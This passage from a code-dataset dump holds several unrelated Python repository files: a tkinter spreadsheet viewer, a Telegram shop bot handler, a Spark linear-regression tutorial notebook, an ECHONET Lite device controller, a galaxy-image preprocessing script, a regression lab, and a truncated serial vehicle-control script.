10 is only high level messages, above 10 will hardly log anything\",\n default = \"10\")\n\n args = parser.parse_args()\n\n Logging.configureLogging(int(args.verbosity))\n\n work = LoadIntoSQL(args)\n work.run()","repo_name":"hakyimlab/MetaXcan","sub_path":"software/metax/deprecated/SQLUtilities.py","file_name":"SQLUtilities.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"61"} +{"seq_id":"40649220985","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import Menu\nfrom tkinter import messagebox\nfrom tkinter import ttk\nimport os\nimport matplotlib.pyplot as plt\nfrom tkinter import filedialog as fd\nimport pandas as pd\nfrom try2 import graphs\n\nimport numpy as np\n\nroot = tk.Tk()\nroot.title(\"Ocean-Book1\")\n\nroot.geometry(\"900x700\")\n\nsidepanel = Frame(root, width=70, bg='#3385ff', relief=SUNKEN)\nsidepanel.pack_propagate(0)\nsidepanel.pack(side=LEFT, fill='y')\n\nmy_file_path = []\n\n\ndef selectFile():\n importf = fd.askopenfilename(initialdir=\"/\", title=\"Select A File\",\n filetype=((\"xlsx files\", \"*.xlsx\"), (\"All Files\", \"*.*\")))\n print(importf, 'importf')\n my_file_path.append(importf)\n print(my_file_path, 'my_file_path')\n myfile()\n\n\nfilepanel = Frame(root, height=450, width=1150)\nfilepanel.pack(side=BOTTOM, padx=70, anchor='sw', fill='x', expand=True)\nfilepanel.pack_propagate(0)\n\ndisplay_file = Text(filepanel)\ndisplay_file.config(state='disabled')\ndisplay_file.pack()\n\n\ndef myfile():\n try:\n if my_file_path[-4:] == \".csv\":\n df = pd.read_csv(my_file_path[-1])\n\n else:\n df = pd.read_excel(my_file_path[-1])\n\n except ValueError:\n tk.messagebox.showerror(\"Information\", \"The file you have chosen is invalid\")\n return None\n except FileNotFoundError:\n tk.messagebox.showerror(\"Information\", f\"No such file as {my_file_path}\")\n return None\n # df = pd.read_excel(my_file_path[-1])\n print(df, 'df')\n display_file.config(state='normal')\n display_file.insert('1.0', df)\n display_file.config(state='disabled')\n data_info(df)\n\n\nsheetpanel = Frame(root, width=100, bg='yellow', height=40)\nsheetpanel.pack_propagate(0)\nsheetpanel.pack(side=TOP, fill='x', anchor='ne', padx=70)\n\nAddIcon = PhotoImage(file=\"C:/Users/acesi/PycharmProjects/Ocean25/new_file.png\")\n\ninputBtn = Button(sidepanel, fg='#732626', bg='#3385ff', text=\"import\", image=AddIcon, command=selectFile)\ninputBtn.pack(pady=50)\n\n\nsheetbtn = Button(sheetpanel, fg='red', bg='black', text='addSheet', command=charts())\nsheetbtn.pack_propagate(0)\nsheetbtn.place(x=20, y=5)\nsheetbtn.pack(padx=20, side=LEFT)\n\ndef charts():\n sidepanel.destroy()\n inputBtn.destroy()\n sheetpanel.destroy()\n sheetbtn.destroy()\n filepanel.destroy()\n display_file.destroy()\n df = pd.read_excel(my_file_path[-1])\n graphs(root, df)\n pass\ndef data_info(df):\n my_cols = df.columns\n my_rows = df.values\n print(df.info())\n # print(my_cols,'\\n next')\n # print(my_rows)\n\n\n\n\n\nroot.mainloop()\n","repo_name":"Mazhar-Aces/my_practice","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5899141938","text":"from keyboards.default.cats import all_cats\nfrom loader import dp, db \nfrom aiogram import types\nfrom states.praduct import Shop\nfrom aiogram.dispatcher import FSMContext\n\n\n@dp.callback_query_handler(state=Shop.amount)\nasync def 
get_amount(call: types.CallbackQuery, state: FSMContext):\n amuount=call.data\n data = await state.get_data()\n title = data.get('title')\n price = data.get('price')\n user_id = data.get('user_id')\n await call.answer(f\"{amuount} ta {title} Savatga qoshildi\", show_alert=True) \n await call.message.answer(\"Asosiy sahifa\",parse_mode=\"html\",reply_markup=all_cats)\n db.add_product_cart(tg_id=user_id, title=title, price=price, amuount=amuount)\n await call.message.delete()\n await Shop.category.set()","repo_name":"matchanov07/texnobozorbot","sub_path":"handlers/users/amount.py","file_name":"amount.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71557183553","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Regression: Predicting Rental Price\n# MAGIC \n# MAGIC In this notebook, we will use the dataset we cleansed in the previous lab to predict Airbnb rental prices in San Francisco.\n# MAGIC \n# MAGIC ## ![Spark Logo Tiny](https://files.training.databricks.com/images/105/logo_spark_tiny.png) In this lesson you:
\n# MAGIC - Use the SparkML API to build a linear regression model\n# MAGIC - Identify the differences between estimators and transformers\n\n# COMMAND ----------\n\nimport os\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Setting the default database and user name \n# MAGIC ##### Substitute \"renato\" by your name in the `username` variable.\n\n# COMMAND ----------\n\n## Put your name here\nusername = \"renato\"\n\ndbutils.widgets.text(\"username\", username)\nspark.sql(f\"CREATE DATABASE IF NOT EXISTS dsacademy_embedded_wave3_{username}\")\nspark.sql(f\"USE dsacademy_embedded_wave3_{username}\")\nspark.conf.set(\"spark.sql.shuffle.partitions\", 40)\n\nspark.sql(\"SET spark.databricks.delta.formatCheck.enabled = false\")\nspark.sql(\"SET spark.databricks.delta.properties.defaults.autoOptimize.optimizeWrite = true\")\n\n# COMMAND ----------\n\ndeltaPath = os.path.join(\"/\", \"tmp\", username) #If we were writing to the root folder and not to the DBFS\nif not os.path.exists(deltaPath):\n os.mkdir(deltaPath)\n \nprint(deltaPath)\n\nairbnbDF = spark.read.format(\"delta\").load(deltaPath)\n\n# COMMAND ----------\n\nairbnbDF.limit(10).display()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Train/Test Split\n# MAGIC \n# MAGIC ![](https://files.training.databricks.com/images/301/TrainTestSplit.png)\n# MAGIC \n# MAGIC **Question**: Why is it necessary to set a seed? What happens if I change my cluster configuration?\n\n# COMMAND ----------\n\ntrainDF, testDF = airbnbDF.randomSplit([.8, .2], seed=42)\nprint(trainDF.cache().count())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Let's change the # of partitions (to simulate a different cluster configuration), and see if we get the same number of data points in our training set.\n\n# COMMAND ----------\n\ntrainRepartitionDF, testRepartitionDF = (airbnbDF\n .repartition(24)\n .randomSplit([.8, .2], seed=42))\n\nprint(trainRepartitionDF.count())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Linear Regression\n# MAGIC \n# MAGIC We are going to build a very simple model predicting `price` just given the number of `bedrooms`.\n# MAGIC \n# MAGIC **Question**: What are some assumptions of the linear regression model?\n\n# COMMAND ----------\n\ndisplay(trainDF.select(\"price\", \"bedrooms\"))\n\n# COMMAND ----------\n\ndisplay(trainDF.select(\"price\", \"bedrooms\").summary())\n\n# COMMAND ----------\n\ndisplay(trainDF)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC There do appear some outliers in our dataset for the price ($10,000 a night??). Just keep this in mind when we are building our models :).\n# MAGIC \n# MAGIC We will use `LinearRegression` to build our first model \n# MAGIC [Python](https://spark.apache.org/docs/latest/api/python/reference/api/pyspark.ml.regression.LinearRegression.html)\n# MAGIC \n# MAGIC The cell below will [fail](https://stackoverflow.com/questions/61056160/illegalargumentexception-column-must-be-of-type-structtypetinyint-sizeint-in) because the Linear Regression estimator expects a vector of values as input. We will fix that with VectorAssembler below. \n\n# COMMAND ----------\n\nfrom pyspark.ml.regression import LinearRegression\n\nlr = LinearRegression(featuresCol=\"bedrooms\", labelCol=\"price\")\n\n# Uncomment when running\nlrModel = lr.fit(trainDF)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Vector Assembler\n# MAGIC \n# MAGIC What went wrong? 
Turns out that the Linear Regression **estimator** (`.fit()`) expected a column of Vector type as input.\n# MAGIC \n# MAGIC We can easily get the values from the `bedrooms` column into a single vector using `VectorAssembler` \n# MAGIC [Python](https://spark.apache.org/docs/latest/api/python/reference/api/pyspark.ml.feature.VectorAssembler.html). \n# MAGIC VectorAssembler is an example of a **transformer**. \n# MAGIC Transformers take in a DataFrame, and return a new DataFrame with one or more columns appended to it. \n# MAGIC They do not learn from your data, but apply rule based transformations.\n# MAGIC \n# MAGIC You can see an example of how to use VectorAssembler on the [ML Programming Guide](https://spark.apache.org/docs/latest/ml-features.html#vectorassembler).\n\n# COMMAND ----------\n\nfrom pyspark.ml.feature import VectorAssembler\n\nvecAssembler = VectorAssembler(inputCols=[\"bedrooms\"], outputCol=\"features\")\nvecTrainDF = vecAssembler.transform(trainDF)\n\n# COMMAND ----------\n\nvecTrainDF.limit(10).display()\n\n# COMMAND ----------\n\nlr = LinearRegression(featuresCol=\"features\", labelCol=\"price\")\nlrModel = lr.fit(vecTrainDF)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Inspect the model\n\n# COMMAND ----------\n\nm = lrModel.coefficients[0]\nb = lrModel.intercept\n\nprint(f\"The formula for the linear regression line is y = {m:.2f}x + {b:.2f}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Apply model to test set\n\n# COMMAND ----------\n\nvecTestDF = vecAssembler.transform(testDF)\n\npredDF = lrModel.transform(vecTestDF)\n\npredDF.select(\"bedrooms\", \"features\", \"price\", \"prediction\").show()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Evaluate Model\n# MAGIC \n# MAGIC Let's see how our linear regression model with just one variable does.\n\n# COMMAND ----------\n\nfrom pyspark.ml.evaluation import RegressionEvaluator\n\nregressionEvaluator = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"price\", metricName=\"rmse\")\n\nrmse = regressionEvaluator.evaluate(predDF)\nr2 = regressionEvaluator.setMetricName(\"r2\").evaluate(predDF)\n\nprint(f\"RMSE is {rmse}\")\nprint(f\"R2 is {r2}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC #### It's still not that great. Let's see how we can further decrease it in the next notebook.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Code modified and enhanced from 2020 Databricks, Inc. All rights reserved.
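\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC _Appendix sketch, not part of the original lesson:_ the `vecAssembler` transformer and `lr` estimator defined above can be chained into a single SparkML `Pipeline`, so one `fit`/`transform` pair covers both stages for `trainDF`/`testDF`.\n\n# COMMAND ----------\n\nfrom pyspark.ml import Pipeline\n\n# Chain the transformer and estimator defined earlier; fit() runs the stages in order\npipeline = Pipeline(stages=[vecAssembler, lr])\npipelineModel = pipeline.fit(trainDF)\n\n# One call both assembles the feature vector and predicts the price\npredPipelineDF = pipelineModel.transform(testDF)\n\n# COMMAND ----------\n\n# MAGIC %md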
\n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.\n# MAGIC
\n# MAGIC Privacy Policy | Terms of Use | Support\n","repo_name":"jvenetillo/InterDataScience","sub_path":"Module_B/Day3/04a_Linear Regression.py","file_name":"04a_Linear Regression.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30266617289","text":"import socket\nimport codecs\nimport time\n\nfrom node import Node\nfrom node import Parent\n\nE_HEADER = \"10810000\"\nE_SEOJ = \"05FF01\"\nE_OPC = \"01\"\nE_PDC1 = \"01\"\n\nclass ParentMain(Parent):\n def __init__(self, config: dict):\n super().__init__(config)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.settimeout(5)\n self.__port = 3610\n self.sock.bind((\"0.0.0.0\", self.__port))\n\n def read(self, params=None):\n super().read(params)\n esv = \"62\"\n epc = \"80\"\n edt = \"00\"\n\n ip_addr = params[\"ip_addr\"]\n deoj = params[\"DEOJ\"]\n epc = params[\"EPC\"]\n\n #print(ip_addr)\n\n message = E_HEADER + E_SEOJ + deoj + esv + E_OPC + epc + E_PDC1 + edt\n msg = codecs.decode(message, \"hex\")\n\n self.sock.sendto(msg, (ip_addr, self.__port))\n \n try:\n data = self.sock.recvfrom(4048)\n except socket.timeout:\n return None\n\n datahex = codecs.encode(data[0], 'hex')\n datastr = codecs.decode(datahex, 'utf-8')\n\n r_addr = data[1][0]\n r_seoj = datastr[8:14]\n r_epc = datastr[24:26]\n value = datastr[28:30]\n \n #print(r_addr)\n #print(r_seoj)\n #print(r_epc)\n\n if ip_addr != r_addr:\n return None\n if int(deoj, 16) != int(r_seoj, 16):\n return None\n if int(epc, 16) != int(r_epc, 16):\n return None\n\n return value\n\n\n def write(self, value, params=None):\n super().write(value, params)\n esv = \"60\"\n epc = \"80\"\n edt = \"00\"\n\n ip_addr = params[\"ip_addr\"]\n deoj = params[\"DEOJ\"]\n epc = params[\"EPC\"]\n edt = value\n\n message = E_HEADER + E_SEOJ + deoj + esv + E_OPC + epc + E_PDC1 + edt\n msg = codecs.decode(message, \"hex\")\n\n self.sock.sendto(msg, (ip_addr, self.__port))\n\n def __del__(self):\n super().__del__()\n self.sock.close()\n\n\n","repo_name":"mmclsntr/liner","sub_path":"nodes/echonetcontrol/echonetlitecontroller.py","file_name":"echonetlitecontroller.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37977513053","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils.reconstruction import reconstruct\n\n\ndef _visualize_images(original_image,\n noisy_image,\n rec_baseline,\n rec_step,\n step,\n t=None):\n if t is not None:\n print(f't = {t}')\n print(f'Noise variance = {np.std(original_image - noisy_image)**2:.3g}')\n print(f'MSE baseline bilateral = {np.mean((rec_baseline - original_image)**2):.3g}')\n for rs in rec_step:\n print(f'MSE step sequential = {np.mean((rs - original_image)**2):.3g}')\n\n nrows = 1 + int(np.ceil(len(rec_step)/3))\n ncols = 3\n w, h, dpi = 1200, int(1200*nrows/ncols), 100\n fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(w/dpi, h/dpi), dpi=dpi)\n\n axs = axs.ravel()\n\n axs[0].imshow(original_image.transpose(1, 2, 0))\n axs[0].set_title('Original image')\n\n axs[1].imshow(noisy_image.transpose(1, 2, 0))\n axs[1].set_title('Noisy input image')\n\n axs[2].imshow(rec_baseline.transpose(1, 2, 0))\n axs[2].set_title('Bilateral filter')\n\n for i, im in enumerate(rec_step):\n #if hasattr(im, \"__getitem__\"):\n # im=im[-1]\n axs[i+3].imshow(im.transpose(1, 2, 0))\n axs[i+3].set_title(f'step size = 
{step[i]}')\n\n for ax in axs:\n ax.set_axis_off()\n\n fig.tight_layout()\n plt.show()\n\n\ndef _visualize_images_plotly(original_image,\n noisy_image,\n rec_baseline,\n rec_step,\n step,\n t=None):\n import plotly.express as px\n\n images=np.concatenate([(noisy_image.transpose(1, 2, 0).clip(0, 1)*255).astype(np.uint8)[None],\n (original_image.transpose(1, 2, 0).clip(0, 1)*255).astype(np.uint8)[None], \n (rec_baseline.transpose(1, 2, 0).clip(0, 1)*255).astype(np.uint8)[None]\n ],\n axis=0)\n\n labels=['noisy', 'original', 'baseline']\n\n for i, im in enumerate(rec_step):\n images=np.concatenate([images,\n im.transpose(1, 2, 0)[None]\n ],\n axis=0)\n labels.append(f'step size = {step[i]}')\n\n nrows = 1 + int(np.ceil((len(rec_step)+1)/2))\n ncols = 2\n w, h, dpi = 1200, int(1200*nrows/ncols), 100\n\n print(w, h)\n\n fig = px.imshow(images, facet_col=0, facet_col_spacing=0.005, facet_row_spacing=0.05, width=w, height=h, facet_col_wrap=2)\n fig.for_each_annotation(lambda a: a.update(text=labels[int(a.text.split(\"=\")[-1])]))\n fig.show()\n\n\ndef reconstruct_and_compare(net,\n original_image,\n noisy_image,\n t,\n variance_schedule,\n device=None,\n sigma=None,\n step_size=1,\n overstep=0.5,\n output_folder=None,\n bilateral_parameters=(2, 0.7),\n return_sequences=True,\n use_plotly=False):\n \"\"\"Visualize a single reconstruction of an image with sequential and single step reconstruction.\n\n Parameters\n ----------\n net : torch.nn.Module\n the model that must reconstruct the image.\n original_image : 3D numpy array\n The original image to be reconstructed. Its shape must be ``(3, height, width)``.\n noisy_image : 3D numpy array\n The noisy image. Its shape must be ``(3, height, width)``.\n t : int\n timestep\n variance_schedule : array or array-like\n sequence for beta_t.\n device : string, optional\n sigma : {int, array or array-like}, optional\n noise sequence to add at each sequential reconstruction step.\n step_size : int, optional\n the number of original timesteps equivalent to the reconstruct timestep.\n overstep : float, optional\n correction factor to the predicted noise. For more info, see Stable diffusion paper.\n The default is 0.5.\n output_folder : str, optional\n if provided, save the original image, noisy image and reconstructinos output_folder.\n bilateral_parameters : tuple(float, float), optional\n set the parameters for the baseline bilateral filtering. The elements are\n ``(sigmaSpace, sigmaColor)``. Default is (2, 0.7).\n return_sequences : bool, optional\n if set to False, returns the reconstructed images for each step_size.\n If set to True, returns the entire reconstruction sequence for each step_size.\n Default is True.\n use_plotly : bool, optional\n Choose whether to use ``plotly`` or ``matplotlib``. Default is False.\n\n Returns\n 3D numpy array (or 4D numpy array if ``return_sequences`` is set to True)\n reconstructed image with shape ``(n_channels, spatial_1, spatial_2)``. 
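\n\n    Examples\n    --------\n    Hypothetical call, assuming ``net``, ``clean_img``, ``noisy_img`` and\n    ``betas`` exist in the caller's scope:\n\n    >>> recs = reconstruct_and_compare(net, clean_img, noisy_img, t=100,\n    ...                                variance_schedule=betas,\n    ...                                step_size=[1, 5, 10])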
\n \"\"\"\n\n if not hasattr(step_size, \"__getitem__\"):\n step_size = [step_size]\n\n rec_baseline = cv2.bilateralFilter(np.asarray(noisy_image, dtype=np.float32).transpose(1, 2, 0),\n d=-1,\n sigmaSpace=bilateral_parameters[0],\n sigmaColor=bilateral_parameters[1])\n\n rec_step = []\n for s in step_size:\n rec_step.append(reconstruct(net, noisy_image, t, variance_schedule, s, overstep=overstep, sigma=sigma, return_sequences=return_sequences, device=device))\n\n if output_folder is not None:\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n plt.imsave(os.path.join(output_folder, 'original.png'), original_image.transpose(1, 2, 0))\n print('original saved')\n plt.imsave(os.path.join(output_folder, 'noisy.png'), noisy_image.transpose(1, 2, 0))\n print('noisy saved')\n plt.imsave(os.path.join(output_folder, 'baseline.png'), rec_baseline)\n print('baseline saved')\n\n for s, im in zip(step_size, rec_step):\n if return_sequences:\n plt.imsave(os.path.join(output_folder, f'rec_step_{s}.png'), im[-1].transpose(1, 2, 0))\n else:\n plt.imsave(os.path.join(output_folder, f'rec_step_{s}.png'), im.transpose(1, 2, 0))\n print(f'step {s} saved')\n\n if use_plotly:\n _visualize_images_plotly(original_image=original_image,\n noisy_image=noisy_image,\n rec_baseline=rec_baseline.transpose(2, 0, 1),\n rec_step=[r[-1] for r in rec_step] if return_sequences else rec_step,\n step=step_size,\n t=t)\n else:\n _visualize_images(original_image=original_image,\n noisy_image=noisy_image,\n rec_baseline=rec_baseline.transpose(2, 0, 1),\n rec_step=[r[-1] for r in rec_step] if return_sequences else rec_step,\n step=step_size,\n t=t)\n \n return [r.transpose(0, 2, 3, 1) for r in rec_step] if return_sequences else rec_step.transpose(1, 2, 0)\n\n\ndef visualize_reconstruction_sequence(rec_images):\n import plotly.express as px\n fig = px.imshow(rec_images, animation_frame=0, width=1000,height=1000)\n fig.show()\n","repo_name":"EnricoPittini/denoising-diffusion-models","sub_path":"utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70027865156","text":"import astropy\nimport os\n\nfrom skimage.transform import resize\nfrom astropy.io import fits\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom multiprocessing import *\nfrom tqdm import tqdm\nimport h5py\nimport tensorflow as tf\nimport pickle\nfrom PIL import Image\n\nfrom lensmcmc.tools import generic_yaml_loader\nfrom lensmcmc.tools.lensing import pixels\nfrom lensmcmc.tools.lensing import counts_AB\nfrom lensmcmc.models.sourcemodels import Sersic\n\nSTATS_FILE = f'../../data/Sersic/Sersic_mag_22_stats.p'\nH5PY_PATH = f\"../../data/Sersic/Sersic_mag_22r%1d.h5\"\nTFRECORDS_PATH = f\"../../data/Sersic_mag_22r%1dp%1d.tfrecords\"\n\ninstrument = generic_yaml_loader('instruments/bells.yaml')\n\npix = pixels(instrument['pixel_size'], instrument['field_of_view'] + 5.9 * instrument['pixel_size'])\n\nNUM_SAMPLES = 100\nSAMPLE_PATH = f'../../data/Sersic/Sersic_mag_22_samples'\n\n\nPARTS_H5PY = 1\nPARTS_TFRECORDS = 4\n\ndef create_tfrecord(_image, _labels, _writer):\n # image = open(image_dir + image_file, mode='rb').read()\n # image_decoded = tf.image.decode_image(image)\n\n ex = tf.train.Example(features=tf.train.Features(feature={\n 'shape': tf.train.Feature(int64_list=tf.train.Int64List(value=_image.shape)),\n 'label': tf.train.Feature(float_list=tf.train.FloatList(value=_labels)),\n 'data': 
tf.train.Feature(float_list=tf.train.FloatList(value=_image.reshape(-1)))\n }))\n _writer.write(ex.SerializeToString())\n\ndef estimate_mean(h5py_file):\n \n mean_acc = np.zeros(shape=(5,))\n count = 0\n \n for fit_file in tqdm(file_list):\n \n count += 1\n mean_acc += np.mean(image, axis=(0,1))\n \n \n return mean_acc / len(file_list)\n \nclass SersicGenerator:\n def __init__(self):\n pass\n \n def generate(self):\n \n galaxy = {\n 'x_position': np.random.uniform(-1.0, 1.0),\n 'y_position': np.random.uniform(-1.0, 1.0),\n 'radius': np.random.uniform(1.0, 4.0),\n 'sersic_index': np.random.uniform(1.0, 4.0),\n 'magnitude': 22, #np.random.uniform(16.0, 28.0),\n 'axis_ratio': np.random.uniform(0.4, 1.0),\n 'position_angle': np.random.uniform(0.0, np.pi)\n }\n\n # Convert magnitude to counts\n total_counts = counts_AB(galaxy['magnitude'], instrument)\n\n # Initialise galaxy model\n galaxy_light_model = Sersic({\n 'x_position': galaxy['x_position'],\n 'y_position': galaxy['y_position'],\n 'radius': galaxy['radius'],\n 'sersic_index': galaxy['sersic_index'],\n 'total_counts': total_counts * (instrument['pixel_size'] ** 2),\n 'axis_ratio': galaxy['axis_ratio'],\n 'position_angle': galaxy['position_angle']\n })\n\n labels = [galaxy['x_position'], galaxy['y_position'], galaxy['radius'], galaxy['sersic_index'],\n galaxy['axis_ratio'], galaxy['position_angle'], total_counts * (instrument['pixel_size'] ** 2)]\n\n # Calculate brightness\n image = instrument['exposure_time'] * galaxy_light_model.ray_trace(pix, sub=10)[:,:,None]\n \n return image, np.array(labels)\n \n def close(self):\n pass\n \ndef save_part_tfrecords(num_data, rank):\n \n n = rank\n images = []\n writer_dict = {}\n\n for resolution_level in range(2, 8 + 1):\n writer_dict[resolution_level] = tf.io.TFRecordWriter(TFRECORDS_PATH % (resolution_level,n))\n\n generator = SersicGenerator()\n mean_ = []\n \n for i in tqdm(range(num_data)):\n \n image, labels = generator.generate()\n mean = np.mean(image, axis=(0,1))\n mean_.append(mean)\n \n for resolution_level in range(2,8+1):\n\n \n resolution = image.shape[0] // (2** (8 - resolution_level))\n downsampled_image = resize(image, (resolution, resolution), order=1)\n\n downsampled_image = np.transpose(downsampled_image, (2,0,1))\n \n \n create_tfrecord(downsampled_image, labels, writer_dict[resolution_level])\n\n for resolution_level in range(2,8+1):\n writer_dict[resolution_level].close()\n \n mean_ = np.array(mean_)\n mean_ = np.mean(mean_, axis=0)\n \n generator.close()\n \n return mean_\n \ndef save_samples(num_samples):\n \n generator = SersicGenerator()\n \n for i in tqdm(range(num_samples)):\n \n image, labels = generator.generate()\n channel = image[...,0] \n \n cm = plt.cm.ScalarMappable(None, cmap='magma')\n cmap = cm.get_cmap()\n channel = (channel - np.min(channel)) / (np.max(channel) - np.min(channel))\n rgb_img = cmap(channel)[..., :3]\n rgb_img = rgb_img * 255\n rgb_img = rgb_img.astype(np.uint8)\n\n result = Image.fromarray(rgb_img)\n result.save(os.path.join(SAMPLE_PATH, '%05d.png' % i))\n with open(os.path.join(SAMPLE_PATH, '%05d.npy' % i), 'wb') as handle:\n np.save(handle, image)\n \ndef save_part_h5py(num_data, rank):\n\n images = []\n writer_dict = {}\n \n generator = SersicGenerator() \n mean_ = []\n\n with h5py.File(H5PY_PATH % rank, 'a') as hf:\n \n for i in tqdm(range(num_data)):\n\n image, labels = generator.generate()\n mean = np.mean(image, axis=(0,1))\n mean_.append(mean)\n \n image_shape = image.shape\n\n grp = hf.create_group(\"%05d\" % i)\n\n image_data = 
grp.create_dataset(\n name='data', data=image.astype('float32'),\n shape=image.shape, maxshape=image_shape, compression=\"gzip\")\n\n label_data = grp.create_dataset(\n name='labels', data=labels.astype('float32'),\n shape=labels.shape)\n \n mean_ = np.array(mean_)\n mean_ = np.mean(mean_, axis=0)\n \n generator.close()\n \n return mean\n\nif __name__ == '__main__':\n \n num_galaxies = 50000\n \n save_samples(50)\n\n print('preparing H5PY...')\n with Pool(processes=PARTS_H5PY) as pool:\n \n print('Saving galaxies')\n \n means_per_file_list = pool.starmap(save_part_h5py, zip([num_galaxies], [0]))\n mean = np.zeros_like(means_per_file_list[0])\n for e in means_per_file_list: \n mean += e\n mean = mean / len(means_per_file_list)\n \n print('mean h5py: ', [mean])\n \n with h5py.File(H5PY_PATH % 0, 'r') as f:\n keys = list(f.keys())\n var_ = []\n for key in tqdm(keys):\n group_selector = f[key]\n data = group_selector['data'][:]\n var_.append(np.mean(np.square(data - mean), axis=(0,1)))\n \n var_ = np.array(var_)\n \n var = np.mean(var_, axis=0)\n \n std = np.sqrt(var)\n \n print('mean, std', [mean, std])\n \n \n print('preparing TFRECORDS...')\n with Pool(processes=PARTS_TFRECORDS) as pool:\n \n print('Saving galaxies')\n \n means_per_file_list = pool.starmap(save_part_tfrecords, zip([num_galaxies // PARTS_TFRECORDS] * PARTS_TFRECORDS, range(PARTS_TFRECORDS)))\n mean = np.zeros_like(means_per_file_list[0])\n for e in means_per_file_list: \n mean += e\n mean = mean / len(means_per_file_list)\n \n print('mean tfrecords: ', [mean])\n \n with open(STATS_FILE, 'wb') as handle:\n pickle.dump([mean,std], handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n print('finished')\n","repo_name":"Akanota/galaxies-metrics-denoising","sub_path":"preprocessing/Sersic/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70692543874","text":"import os\nfrom sklearn.metrics import mean_squared_error\n\nfrom lab6.regression.my_regression import my_regression\nfrom lab6.regression.sk_learn_regression import sk_learnRegression\nfrom lab6.utils.data_division import divideData\nfrom lab6.utils.plotters import plotGDP, plotFreedom, plotDataHistogram, plotAll, plotSplitData\nfrom lab6.utils.reader import loadAsDF, loadData, correlatedDF\n\nif __name__ == '__main__':\n crtDir = os.getcwd()\n filePath = os.path.join(crtDir, 'data', 'v1_world-happiness-report-2017.csv')\n gdp, freedom, happiness = loadAsDF(filePath)\n # gdp1, freedom1, happiness1 = loadData(filePath, 'Economy..GDP.per.Capita.', 'Freedom', 'Happiness.Score')\n mdl = my_regression(gdp, freedom, happiness)\n print('regression using the formula in the lab6 jupyter notebook:\\n', mdl)\n\n trainInputs, trainOutputs, validationInputs, validationOutputs = divideData(gdp, freedom, happiness)\n\n toolModel, regressor = sk_learnRegression(trainInputs, trainOutputs)\n computedValidationOutputs = regressor.predict([x for x in validationInputs])\n\n print('regression using sk-learn:\\n', toolModel)\n\n error = 0.0\n for t1, t2 in zip(computedValidationOutputs, validationOutputs):\n error += (t1 - t2) ** 2\n error = error / len(validationOutputs)\n print(\"prediction error (manual): \", error)\n\n error = mean_squared_error(validationOutputs, computedValidationOutputs)\n print(\"prediction error (tool): \", error)\n\n plotDataHistogram(gdp, 'GDP')\n plotDataHistogram(freedom, 'Freedom')\n plotDataHistogram(happiness, 'Happiness')\n 
plotAll(gdp, freedom, happiness)\n plotGDP(gdp, happiness)\n plotFreedom(freedom, happiness)\n plotSplitData([trainInputs, trainOutputs], [validationInputs, validationOutputs])\n","repo_name":"andrei45635/AI","sub_path":"lab6/laborator6.py","file_name":"laborator6.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33975680687","text":"#!/usr/bin/env python\n# -*-coding: utf-8-*-\nimport serial\nimport time \nimport struct\nfrom math import radians\nfrom math import degrees\nfrom math import cos\nfrom math import sin\nfrom math import asin\nfrom math import pow\nfrom math import atan2\nimport csv\nfrom time import sleep\nimport rospy\nfrom master.msg import sync_msg\n\n# ser = serial.Serial('/dev/ttyUSB2', 115200)\nser = serial.Serial('/dev/pts/16', 38400)\n# path_x = [ 0, 0, 0, 10];\n# path_y = [ 10, 20, 30, 40 ]; \npath_x = [ ];\npath_y = [ ];\npath_k = [ ];\npath_idx = 0;\nlook_ahead = 3\nspeed_lim = 12\nfirst_chk = True\nk = 0.2\n\n\n#gear 0:D, 1:N, 2:R\ndef send_packet(steering, speed, gear):\n result = ser.readline() # erp -> pc\n cnt = result[15]\n\n result = struct.pack('!BBBBBBHhBBBB', 0x53, 0x54, 0x58, 0x01, 0x00, gear, int(speed),\n steering, 0x01, cnt, 0x0D, 0x0A ) # big endian 방식으로 타입에 맞춰서 pack \n ser.write(result)\n\n\ndef action_lane_right():\n start_t = time.time()# 시작 시간 저장\n while((time.time()-start_t)<3):\n send_packet(30,10, 0) \n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(0,5, 0)\n start_t = time.time()\n 